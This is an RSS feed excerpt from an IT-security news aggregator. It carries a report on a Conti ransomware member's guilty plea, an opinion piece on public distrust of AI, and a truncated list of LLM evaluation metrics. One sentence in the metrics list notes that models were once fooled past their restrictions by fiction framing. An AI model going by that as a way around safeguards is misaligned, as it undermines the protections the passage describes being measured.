<content:encoded><![CDATA[<p>A Ukrainian national pleaded guilty to conspiracy to commit wire fraud in connection with the deployment of Conti ransomware, which targeted more than 1,000 victims worldwide. According to the U.S. Department of Justice, 44-year-old Oleksii Oleksiyovych Lytvynenko joined the Conti…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ukrainian-national-pleads-guilty-in-connection-with-conti-ransomware/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ukrainian-national-pleads-guilty-in-connection-with-conti-ransomware/">Ukrainian national pleads guilty in connection with Conti ransomware</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ukrainian national pleads guilty in connection with Conti ransomware]]></title>
<description><![CDATA[A Ukrainian national pleaded guilty to conspiracy to commit wire fraud in connection with the deployment of Conti ransomware, which targeted more than 1,000 victims worldwide. According to the U.S. Department of Justice, 44-year-old Oleksii Oleksiyovych Lytvynenko joined the Conti conspiracy in o...]]></description>
<link>https://tsecurity.de/de/3599139/it-security-nachrichten/ukrainian-national-pleads-guilty-in-connection-with-conti-ransomware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599139/it-security-nachrichten/ukrainian-national-pleads-guilty-in-connection-with-conti-ransomware/</guid>
<pubDate>Mon, 15 Jun 2026 14:53:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A Ukrainian national pleaded guilty to conspiracy to commit wire fraud in connection with the deployment of Conti ransomware, which targeted more than 1,000 victims worldwide. According to the U.S. Department of Justice, 44-year-old Oleksii Oleksiyovych Lytvynenko joined the Conti conspiracy in or around September 2021 and possessed data stolen from eight U.S. victims and four overseas victims. “Lytvynenko further admitted to joining a team run by a Conti conspirator during which time Lytvynenko was … <a href="https://www.helpnetsecurity.com/2026/06/15/conti-ransomware-member-pleads-guilty/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/15/conti-ransomware-member-pleads-guilty/">Ukrainian national pleads guilty in connection with Conti ransomware</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Conti Ransomware Conspirator Pleads Guilty in $150M Scheme]]></title>
<description><![CDATA[A Ukrainian national has pleaded guilty to his role in the Conti ransomware operation, one of the most prolific cybercrime campaigns in recent years. The U.S. Department of Justice announced that Oleksii Oleksiyovych Lytvynenko, 44, admitted to participating in a conspiracy that deployed Conti ra...]]></description>
<link>https://tsecurity.de/de/3598678/it-security-nachrichten/conti-ransomware-conspirator-pleads-guilty-in-150m-scheme/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598678/it-security-nachrichten/conti-ransomware-conspirator-pleads-guilty-in-150m-scheme/</guid>
<pubDate>Mon, 15 Jun 2026 11:52:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Conti-ransomware.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Conti ransomware" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Conti-ransomware.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Conti-ransomware-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Conti Ransomware Conspirator Pleads Guilty in $150M Scheme 4"></p>A Ukrainian national has pleaded guilty to his role in the <a href="https://thecyberexpress.com/putin-team-joins-list-conti-ransomware/" target="_blank" rel="noopener">Conti ransomware </a>operation, one of the most prolific cybercrime campaigns in recent years. The <a href="https://thecyberexpress.com/justice-department-seizes-heartsender-websites/" target="_blank" rel="noopener">U.S. Department of Justice</a> announced that Oleksii Oleksiyovych Lytvynenko, 44, admitted to participating in a conspiracy that deployed Conti ransomware against more than 1,000 victims worldwide, resulting in at least $150 million in <a href="https://thecyberexpress.com/ransomware-payments-fell-after-law-enforcement/" target="_blank" rel="noopener">ransom payments</a>.

Lytvynenko entered his guilty plea after being extradited from Ireland to the United States. He pleaded guilty to participating in a wire <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28695">fraud</a> conspiracy connected to the ransomware scheme that targeted organizations across the United States and dozens of other countries.
<h3><strong>Conti Ransomware Targeted Victims Worldwide</strong></h3>
<a href="https://www.justice.gov/opa/pr/ukrainian-national-pleads-guilty-wire-fraud-conspiracy-connection-conti-ransomware" target="_blank" rel="nofollow noopener">According to court documents</a>, the Conti ransomware group carried out attacks between 2020 and 2022, compromising computers and networks in 47 U.S. states, the District of Columbia, Puerto Rico, and 31 foreign countries.

Investigators allege that members of the operation gained unauthorized access to victim networks, encrypted critical <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28699">data</a>, and demanded ransom payments in exchange for restoring access. Victims were also threatened with public exposure of stolen information if they refused to pay.

The FBI estimates that, by January 2022, the <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-ransomware-how-it-work/" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28701">ransomware</a> campaign had generated at least $150 million in ransom proceeds, making Conti one of the most financially damaging ransomware operations ever investigated by U.S. authorities.

Assistant Attorney <a class="wpil_keyword_link" href="https://cyble.com/general/" target="_blank" rel="noopener" title="General" data-wpil-keyword-link="linked" data-wpil-monitor-id="28700">General</a> A. Tysen Duva said the defendants used the ransomware variant to terrorize businesses and individuals globally, causing extensive financial losses and operational disruption.
<h3><strong>Defendant Admitted Role in Malware Development</strong></h3>
Court filings show that Lytvynenko joined the conspiracy no later than September 2021. He admitted to possessing stolen data belonging to eight U.S. victims and four international victims whose information had been compromised by members of the group.

Authorities also stated that he worked as part of a team directed by another Conti conspirator and assisted in developing a <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-malware/" target="_blank" rel="noopener" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28697">malware</a> "loader." Such tools are commonly used to deploy malicious software and execute additional attacks on compromised systems.

The admission provides investigators with further insight into the technical infrastructure behind the Conti ransomware operation and the roles played by individual members within the criminal enterprise.
<h3><strong>International Cooperation Led to Arrest and Extradition</strong></h3>
The case highlights the growing collaboration between international law enforcement agencies in combating <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/" target="_blank" rel="noopener" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28698">cybercrime</a>. U.S. authorities worked alongside multiple Irish agencies, including the Irish Department of Justice, Home Affairs and Migration, the Office of the Attorney General, and the Garda National <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Cyber Crime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28696">Cyber Crime</a> Bureau to secure Lytvynenko's arrest and extradition.

Assistant Director Brett Leatherman of the FBI <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="Cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="28702">Cyber</a> Division described the guilty plea as an important step toward holding cybercriminals accountable for the damage caused to victims around the world.

The U.S. Secret Service also emphasized that international borders would not prevent authorities from pursuing individuals involved in ransomware operations. Officials said the case demonstrates a continued commitment to identifying and prosecuting every member of organized cybercriminal networks.
<h3><strong>Part of Broader Operation Riptide Crackdown</strong></h3>
The prosecution forms part of <strong>Operation Riptide</strong>, an ongoing FBI initiative targeting criminal actors, infrastructure, and financial networks involved in cyber-enabled crime and fraud.

According to the Department of Justice, Americans reported more than $20 billion in cybercrime-related losses last year, representing a 26% increase from the previous year. Through <strong>Operation Riptide</strong>, authorities are focusing on dismantling ransomware groups, fraud operations, and other transnational cybercriminal organizations responsible for significant financial harm.

Lytvynenko faces a maximum sentence of 20 years in federal prison. He is scheduled to be sentenced on September 10, 2026. A federal judge will determine the final sentence after considering federal sentencing guidelines and other statutory factors.

The investigation was led by the FBI's San Diego, Nashville, and El Paso field offices, alongside the U.S. Secret Service. Prosecutors noted that the case remains part of a broader effort to identify and prosecute additional individuals linked to the <strong>Conti ransomware</strong> conspiracy.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI is becoming a dirty word]]></title>
<description><![CDATA[You may have noticed, but people don’t like AI very much. Of course, it depends on the circles you move in, but survey after survey shows that the general perception is becoming increasingly negative. Anecdotal evidence for this can also be found when talking to people outside the IT sphere, or h...]]></description>
<link>https://tsecurity.de/de/3598600/it-nachrichten/ai-is-becoming-a-dirty-word/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598600/it-nachrichten/ai-is-becoming-a-dirty-word/</guid>
<pubDate>Mon, 15 Jun 2026 11:16:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>You may have noticed, but people don’t like AI very much. Of course, it depends on the circles you move in, but survey after survey shows that the general perception is becoming increasingly negative. Anecdotal evidence for this can also be found when talking to people outside the IT sphere, or hanging out on the internet. In many comment fields, AI is almost a swear word today.</p>



<p>A rather telling survey came out the other day: One in five Swedes <a href="https://computersweden.se/article/4183704/var-femte-svensk-kanner-ai-skam-pa-jobbet.html" rel="nofollow">feels ashamed</a> about using AI at work. And it’s easy to imagine how the conversation goes in the workplace to provoke such feelings, when the technology that is supposed to revolutionize how we work is seen as something shameful.</p>



<p>Last week, union think tank Futurion released a report on Swedes’ views on AI, and it’s not exactly fun reading for tech optimists. Swedes believe AI will <a href="https://computersweden.se/article/4180516/svenskarna-ai-kommer-gora-nastan-allt-varre.html" rel="nofollow">make almost everything worse</a>, whether it’s about the labor market, democracy, or security. </p>



<p>The <a href="https://futurion.se/wp-content/uploads/2026/06/futurion-x-seismic-rapport-ai-2026-2-juni.pdf" rel="nofollow">survey</a> also shows that younger people are very, very worried. Six out of 10 students look with horror at their future working life, with fewer jobs and outdated knowledge.</p>



<p>International surveys say the same thing. An American <a href="https://www.waltonfamilyfoundation.org/about-us/newsroom/gen-z-resentment-toward-ai-grows-as-adoption-stagnates-and-workplace-fears-mount" rel="nofollow">Gallup poll</a> from April showed that Generation Z is becoming increasingly angry and anxious, while their enthusiasm and optimism are rising. We have also seen this physically recently when clips were circulated of students <a href="https://www.theguardian.com/technology/2026/may/26/students-boo-pro-ai-graduation-speakers" rel="nofollow">booing</a> prominent graduation speakers who talk positively about AI. </p>



<p>At the same time, another form of physical resistance to AI development is emerging in the form of a movement that fights against the construction of new data centers. It is mainly occurring in the US, but it is only a matter of time before we see the same thing in Sweden.</p>



<p>There are several reasons for all this. An important key is found in Stanford’s big AI report from last spring, which, among other things, examined the difference in attitudes towards AI between AI experts and ordinary people. And the gap between what tech people think and what ordinary people think <a href="https://hai.stanford.edu/ai-index/2026-ai-index-report/public-opinion#:~:text=5.%20AI%20experts%20and%20the%20U.S.%20public%20have%20very%20different%20perspectives%20on%20AI%27s%20future%2C%20except%20on%20elections%20and%20personal%20relationships." rel="nofollow">is enormous</a>. </p>



<p>The gap has arisen partly because it is the AI ​​vendors who have driven the development without involving the public. Someone described AI as a technology that is introduced without consent, which is quite accurate. AI is suddenly invading everywhere, at work, in leisure, in culture, and in relationships, and it is all mostly completely unsolicited. People are starting to get quite tired and fed up with AI, rightly so.</p>



<p>But above all, the gap has arisen because AI vendors and AI enthusiasts don’t seem to have really understood where their rhetoric is coming from. After all, it’s the AI ​​people themselves who are constantly telling us how dangerous the technology is, how it will take all jobs, and how hopeless you are if you don’t keep up. At the same time, the technology is being touted as fantastic. It’s no wonder people are confused. And scared.</p>



<p>Because what are the upsides that are highlighted? Absolutely, people like their ChatGPT and fixing their photos with AI, but otherwise most of the gratitude and enthusiasm should come from becoming more efficient and productive at work. And here I think the AI ​​advocates, and the business leaders, don’t really have their finger on the pulse.</p>



<p>I could be wrong, but in my world, most people are not driven by being more efficient at work, at any cost. The primary driver is not the company’s bottom line, but rather being able to use their hard-earned knowledge and professional skills in a way that is both appreciated and that gives personal pride and satisfaction. </p>



<p>Of course, if the increased productivity is also reflected in the salary envelope, it could be an important driver, but so far it does not look like that is the case. Instead, I suspect that the general feeling is that the use of AI is rather the first step towards the complete elimination of one’s job and professional skills.</p>



<p>Much of this is just fear, as AI’s impact on the job market has so far been marginal from a macro perspective. But as <a href="https://www.cio.com/article/4171054/ai-driven-layoffs-arent-making-business-sense.html">reports of job cuts increase</a> and <a href="https://www.cio.com/article/4047844/ai-is-taking-over-junior-positions-in-it.html">entry-level jobs become scarcer</a>, concerns are growing, especially among the younger generation.</p>



<p>I also notice a clear difference between generations. A lot of those who are most enthusiastic about technology, especially on LinkedIn, are in my generation (X) and older. While the younger people in the comments sections on TikTok are much more negative.</p>



<p>Of course, this is partly because LinkedIn is “peppy” in nature, but on a deeper level, I think the older generations are actually more enthusiastic because AI is a manifestation of a technological development and future that has been promised for decades. It feels like what we have seen in movies and read in books is now, finally, becoming reality. The future is here!</p>



<p>For the younger generations, the effect is the opposite. Young people today have lived through crisis after crisis throughout their entire upbringing, from financial crisis to pandemic to current global chaos, and are not doing very well. </p>



<p><a href="https://www.hhs.se/sv/om-oss/news/sse/2026/ny-studie-stor-klyfta-i-lycka-mellan-unga-vuxna-och-aldre-i-sverige/" rel="nofollow">When Swedes were asked</a> about their well-being just before AI became widespread, older people were among the happiest in the world, while younger Swedes reported lower life satisfaction, less meaning in life, and worse financial security than older age groups. But the younger people also said they had high expectations and great optimism for the future. </p>



<p>Then Sam Altman came along and said that the bright future was not theirs anymore.</p>



<p>The debate has begun to call it “AI has a marketing problem,” and that is true to the extent that it is clear that the rhetoric surrounding the technology worries more than it excites. Much of this lies with AI vendors, but also with politicians, business leaders, managers, and AI enthusiasts whose inability to be concrete and responsive in their communication creates more uncertainty and insecurity than faith in the future.</p>



<p>I believe that clarity is the only way to turn this around. Clarity in the advantages and disadvantages of technology, clarity in what it can and cannot do, clarity in what we should use it for and what we should not use it for, clarity in desired and unwanted results, and perhaps above all, clarity in what you know and what you don’t know.</p>



<p>Most people seem to agree that AI will be a big part of our future. The only question is what that future looks like and how we make it as bright as possible.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[33 LLM metrics to watch closely]]></title>
<description><![CDATA[We’ve all heard the mantra from the quants in the business community: you can’t manage what you can’t measure. And if that’s true for human intelligence, it should be true for the artificial kind too.



How do we measure agents and large language models (LLMs)? We’re just beginning to come up wi...]]></description>
<link>https://tsecurity.de/de/3598559/ai-nachrichten/33-llm-metrics-to-watch-closely/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598559/ai-nachrichten/33-llm-metrics-to-watch-closely/</guid>
<pubDate>Mon, 15 Jun 2026 11:03:23 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>We’ve all heard the mantra from the quants in the business community: you can’t manage what you can’t measure. And if that’s true for human intelligence, it should be true for the <a href="https://www.infoworld.com/article/4061121/a-brief-history-of-ai.html" data-type="link" data-id="https://www.infoworld.com/article/4061121/a-brief-history-of-ai.html">artificial kind</a> too.</p>



<p>How do we measure <a href="https://www.infoworld.com/article/3812583/what-you-need-to-know-about-developing-ai-agents.html" data-type="link" data-id="https://www.infoworld.com/article/3812583/what-you-need-to-know-about-developing-ai-agents.html">agents</a> and <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html" data-type="link" data-id="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html">large language models</a> (LLMs)? We’re just beginning to come up with statistical metrics. Here are several of the most common metrics that designers and users toss about when they’re evaluating a model.</p>



<h6 class="wp-block-heading">[ See also: <a href="https://www.infoworld.com/article/4152738/27-questions-to-ask-before-choosing-an-llm.html" data-type="link" data-id="https://www.infoworld.com/article/4152738/27-questions-to-ask-before-choosing-an-llm.html">27 questions to ask before choosing an LLM</a> ]</h6>



<h2 class="wp-block-heading">Time to first token</h2>



<p>How long does it take to generate the first token? For real-time applications with time constraints, faster responses can be essential. It’s well-known that people hate waiting even a few milliseconds. The teams that develop user interfaces learned decades ago that it’s important for the software to respond quickly when a human is waiting for an answer. Even a few seconds of delay mean that the human will wander off to another window to check some email or place some bet on a prediction market. Time to first token is a good measure for models that will be working directly with the fickle human intelligences and their latent attention deficit disorder.</p>



<h2 class="wp-block-heading">Time per output token</h2>



<p>Take the total time it takes to respond and divide by the total number of tokens. The time to first token measures how long it takes to start a response and this measures the average speed as the model through all of the tokens. In basic LLMs, this value is generally fairly constant. Once the prefill is done and the LLM enters the decode phase, the output tokens usually appear at a constant stream. When the output is long enough, the startup time to first token is amortized away. In some of the more complicated architectures with loops for planning or gathering data from various tools, the average speed can vary as the model shifts in and out of making agentic decisions.</p>



<h2 class="wp-block-heading">Tokens per second</h2>



<p>This is just the reciprocal of the average time per token. Sometimes it is reported separately for different stages in the pipeline.</p>



<h2 class="wp-block-heading">Throughput (requests per minute)</h2>



<p>If a system supports more than a single user, tracking the number of different requests makes sense. These throughput numbers can be quite useful for measuring the power of some of the newer pipelines that are more efficient when they’re answering multiple prompts at the same time.</p>



<h2 class="wp-block-heading">Error rate</h2>



<p>Not every request gets an answer. The error rate tracks how often rate limits, timeouts, or model “refusals” get in the way. Better accounting tracks each independently because the number of failures in each category can be very different.</p>



<h2 class="wp-block-heading">Token efficiency</h2>



<p>Not all work tokens are visible and not all tokens are part of the final outcome. This measures how much work is done to produce the final result. As models become more complex or agentic and the pipelines become more sophisticated, the efficiency tends to drop. Agentic reasoning and strategic planning typically require more tokens that don’t appear in the final answer. This is generally a measure of how expensive a model might be to run.</p>



<h2 class="wp-block-heading">Tail latency</h2>



<p>It’s all well and good to measure the average time to answer, but in some cases a few very slow responses can really color people’s judgement. Some applications require good performance all of the time. Would you want to ride in an autonomous car that gets steering instructions very quickly “on average” instead of always? What if that’s only 99% of the time? Tail latency uses a mixture of queuing theory and detailed measurements to track the worst moments in the long tail of the latency graph. It’s useful when even occasional delays are problematic. </p>



<h2 class="wp-block-heading">Total cost of ownership</h2>



<p>Projects that use an API or buy output from providers just look at the cost per 1M tokens. They’re effectively renters. The groups that are buying GPUs and paying for electricity, though, will add up these costs and other indirect costs like depreciation and maintenance to come up with a number that estimates how much the tokens really cost to produce. This value will depend upon demand and utilization rates—that is, on how many users are sending in prompts and how efficiently the model fits in a particular GPU and its RAM.</p>



<h2 class="wp-block-heading">Parameters</h2>



<p>Many models have numbers in their name followed by a B. This is meant to roughly capture the number of parameters, or the number of variables the model uses to generate outputs from inputs. The number “70B” means that there are about 70 billion parameters in the model. This is a good estimate for the complexity of the model and the size of the training set that has been stuffed into it. Generally bigger numbers mean a larger amount of information is hiding inside the model. It often means that it will take a bigger GPU with more RAM to generate an answer with it. It’s not a very precise number, though, because there are many other areas of the architecture that can influence whether the model can generate the answer you want inside your budget. There continue to be advances and it’s not uncommon for someone to claim that a new model with X parameters is better than an old model with 2X or 3X parameters.</p>



<h2 class="wp-block-heading">Hallucination rate</h2>



<p>While everyone wants LLMs to generate accurate output, measuring it can be difficult because deciding what’s accurate is sometimes complicated. One approach is to ask the LLM to summarize a document. Then another model evaluates how well the summary matches the original. While this may not catch all subtle slips, it will capture enough of the worst departures from reality. Some researchers have built complex test sets with curated answers. The LLMs that deliver the expected answers get the highest scores. Some common benchmarks are <a href="https://github.com/sylinrl/TruthfulQA">TruthfulQA</a>, <a href="https://arxiv.org/abs/2305.11747">HaluEval</a>, <a href="https://github.com/salesforce/QAFactEval">QAFactEval</a>, and Vectara’s <a href="https://github.com/vectara/hallucination-leaderboard">Hallucination Evaluation Model</a> (HHEM).</p>



<h2 class="wp-block-heading">Toxicity and bias scores</h2>



<p>If measuring accuracy is difficult, building a metric to detect toxic or biased output is even more challenging because the definitions can be so protean. Still, some teams have built LLMs that key on particular concepts or word choices. They can detect some of the most obvious red flags that could generate political trouble. Some well-known versions include <a href="https://www.granica.ai/blog/granica-launches-ai-data-safety-solution-granica-screen-on-aws-marketplace">Granica Screen</a> and <a href="https://perspectiveapi.com/">Perspective API</a>.</p>



<h2 class="wp-block-heading">PII leakage</h2>



<p>One of the biggest fears is that LLMs will somehow absorb information that may be considered personal and private. Some of the simplest measures can be as simple as regular expressions that look for the sixteen digit numbers used for credit card transactions. Many of the model builders work on eliminating personally identifiable information (PII) from the training set before beginning.</p>



<h2 class="wp-block-heading">Tool-calling accuracy</h2>



<p>As models grow more complex and agentic, they often gain access to various tools or <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) gateways that can help them find the best answers. Not all models take advantage of this help. The tool-calling accuracy scores count how often the models choose the best tool for the job. One particular example of this measurement is <a href="https://gorilla.cs.berkeley.edu/leaderboard.html">BFCL</a> (Berkeley Function Calling Leaderboard).</p>



<h2 class="wp-block-heading">Prompt sensitivity</h2>



<p>The value captures how small changes in the language of the prompt induces the model to produce different results. It’s like a derivative from calculus class, although it’s generally computed experimentally using some collection of test prompts. There are a number of different approaches that depend upon different types of changes. Some test sets are built with small rephrasing of the request that are semantically the same. Others mix together different ways of specifying the problem, some with examples, say, and some without. Some specific examples include <a href="https://arxiv.org/html/2509.13680">PromptSE</a> and <a href="https://arxiv.org/abs/2410.12405">ProSA</a>.</p>



<h2 class="wp-block-heading">Semantic similarity and conciseness</h2>



<p>Some metrics evaluate the answers by comparing them to a set of gold standard answers. This often involves feeding them to a <a href="https://www.infoworld.com/article/2335281/vector-databases-in-llms-and-search.html" data-type="link" data-id="https://www.infoworld.com/article/2335281/vector-databases-in-llms-and-search.html">vector embedding</a> model and searching a <a href="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html" data-type="link" data-id="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html">retrieval-augmented generation</a> (RAG) database for similar answers. This can track how concise or fluffy the answers might be as well as looking for how much variability might be introduced through changing parameters like the temperature. One common example is the <a href="https://bertscore.com/">BERTScore</a>.</p>



<h2 class="wp-block-heading">Grounding score</h2>



<p>Many systems that combine an LLM with a vector search tool for RAG measure the effectiveness of the combination with a benchmark like the grounding score. The LLM is presented with extra data from the vector search and the benchmark measures how closely it follows this extra information. That is, how much of the answer comes from the provided source documents and how much is synthesized using the data in its training set. Some examples include <a href="https://aclanthology.org/2024.eacl-demo.16/">RAGAS</a>, <a href="https://www.trulens.org/">TruLens</a>, <a href="https://ares-ai.vercel.app/">ARES</a> (Automated RAG Evaluation System), <a href="https://github.com/chen700564/RGB">RGB</a> (Retrieval-Augmented Generation Benchmark), <a href="https://arxiv.org/abs/2305.11747">HaluEval</a>, and <a href="https://halluhard.com/">HalluHard</a>. A similar concept is called “context adherence,” “context precision,” “context recall,” or “faithfulness.”</p>



<h2 class="wp-block-heading">Model variability</h2>



<p>Most LLMs fold in a certain amount of random entropy, and this amount is often controlled by a parameter called the “temperature.” The model variability is a measure of how much the answers will change between runs. Some applications like chatbots require a certain amount of variability because the randomness adds a bit of “life” to the answers. Other applications like those in mission-critical areas like law or medicine will undermine confidence if the answers vary.</p>



<h2 class="wp-block-heading">Format compliance rate</h2>



<p>In some roles, LLMs are asked to produce data in strict formats like JSON or CSV. This is often important if the data will be fed into some pipeline for further processing or storage. The format compliance rate tests a number of common formats and measures how often the LLM returns semantically correct data. Agentic systems that glue together multiple LLMs and other tools rely heavily on LLMs with good scores on this benchmark.</p>



<h2 class="wp-block-heading">Instruction following</h2>



<p>Some prompts include very specific instructions and the adherence can be measured empirically. For example, some prompts will ask the LLM to produce exactly 300 words or a poem in rhyming couplets. These tests use a collection of sample prompts that ask for answers that can be easily measured. Some specific examples include <a href="https://arxiv.org/abs/2311.07911">IFEval</a>, <a href="https://github.com/YJiangcm/FollowBench">FollowBench</a>, and the <a href="https://gorilla.cs.berkeley.edu/leaderboard.html">BFCL</a> (Berkeley Function Calling Leaderboard), a value that is mentioned above in the section on tool usage.   </p>



<h2 class="wp-block-heading">Subgoal success rate</h2>



<p>As agentic models become more common, it’s helpful to track how well the model performs on each of the various parts of the agent’s strategic plan. All of the metrics here can be broken down and tracked for each of the subgoals.</p>



<h2 class="wp-block-heading">Plan stability</h2>



<p>Agentic models start with a plan. Some of them are smart enough to abandon the plan or at least adjust it as the work evolves. Plan stability measures how often the plans are adjusted. A high rate of adjustment could mean that the agent is a bad planner or just flexible or maybe both.</p>



<h2 class="wp-block-heading">Self-correction score</h2>



<p>Some agents are able to dive deeper and recognize their mistakes. The self-correction score measures how often the model will make a mistake and then recognize it, either on its own or after being prompted with the question, “Are you really sure?”</p>



<h2 class="wp-block-heading">Jailbreak resistance</h2>



<p>Some users try to find clever ways to lure the LLM into tossing aside any restrictions on topics or answers. In the past, some LLMs could be fooled by being told the answer was part of a play or a work of fiction. So discussing forbidden subjects wasn’t a problem because it was all pretend. Newer models have more elaborate defenses. Measures of the ability to resist deception include <a href="https://jailbreakbench.github.io/">JailbreakBench</a>, <a href="https://arxiv.org/abs/2410.09024">AgentHarm</a>, and <a href="https://arxiv.org/pdf/2512.05485">Tele-AI-Safety</a>. </p>



<h2 class="wp-block-heading">Prompt injection vulnerability</h2>



<p>Sometimes untrusted data from extra sources or skills may include malicious instructions that can exploit the LLM. Benchmarks such as <a href="https://arxiv.org/abs/2602.20156">Skill-Inject</a> and <a href="https://spikee.ai/">SPIKEE</a> (Simple Prompt Injection Kit for Evaluation and Exploitation) work with known attack vectors and measure how susceptible a model is to targeted prompt injection attacks. </p>



<h2 class="wp-block-heading">Copyright infringement score </h2>



<p>Some LLMs can regurgitate the data in their training corpus in a way that seems like plagiarism or copyright infringement. This can be an issue when the training material wasn’t carefully licensed. The copyright infringement score measures how often the LLM may parrot the training material a bit too closely. Tools for defending against this include <a href="https://www.patronus.ai/blog/introducing-copyright-catcher">CopyrightCatcher</a> and <a href="https://arxiv.org/abs/2402.09910">DE-COP</a>. </p>



<h2 class="wp-block-heading">RULER</h2>



<p>How well can a model extract information from the entire context? <a href="https://github.com/gkamradt/needle-in-a-haystack" data-type="link" data-id="https://github.com/gkamradt/needle-in-a-haystack">NIAH</a> (needle-in-a haystack) <a href="https://arxiv.org/pdf/2504.04713" data-type="link" data-id="https://arxiv.org/pdf/2504.04713">benchmarks</a> measure how well a model can retrieve small, crucial bits of information from long contexts. <a href="https://github.com/NVIDIA/RULER">RULER</a> takes NIAH tests further with the ability to vary the types and quantities of needles, the size of the haystack, and the complexity of the task. </p>



<h2 class="wp-block-heading">GSM8K </h2>



<p>The developers of <a href="https://arxiv.org/abs/2110.14168" data-type="link" data-id="https://arxiv.org/abs/2110.14168">GSM8K</a> (Grade School Math 8K) set out to benchmark an LLM’s ability to tackle multistep mathematical problems, so they gathered <a href="https://huggingface.co/datasets/openai/gsm8k">8,500 problems</a> that are common in grade school math classes. While the focus is explicitly on solving math homework problems, the benchmark also measures the ability to construct reasoning chains.</p>



<h2 class="wp-block-heading">GPQA</h2>



<p>The <a href="https://arxiv.org/pdf/2311.12022">Graduate-Level Google-Proof Q&amp;A</a> is composed of hundreds of hard questions that might normally be answered by humans in graduate school, generally in science. To make the benchmark harder, the researchers focused on questions that non-experts often get wrong. The term “Google-proof” means that the benchmark includes questions that can’t be easily answered by asking a search engine.</p>



<h2 class="wp-block-heading">MMLU-Pro</h2>



<p>The <a href="https://github.com/TIGER-AI-Lab/MMLU-Pro" data-type="link" data-id="https://github.com/TIGER-AI-Lab/MMLU-Pro">MMLU-Pro</a> benchmark builds on the Massive Multitask Language Understanding dataset to test a model’s understanding of a broad set of scientific knowledge. It includes more than 12,000 questions about general scientific fields like biology, chemistry, economics, and law. </p>



<h2 class="wp-block-heading">MBPP</h2>



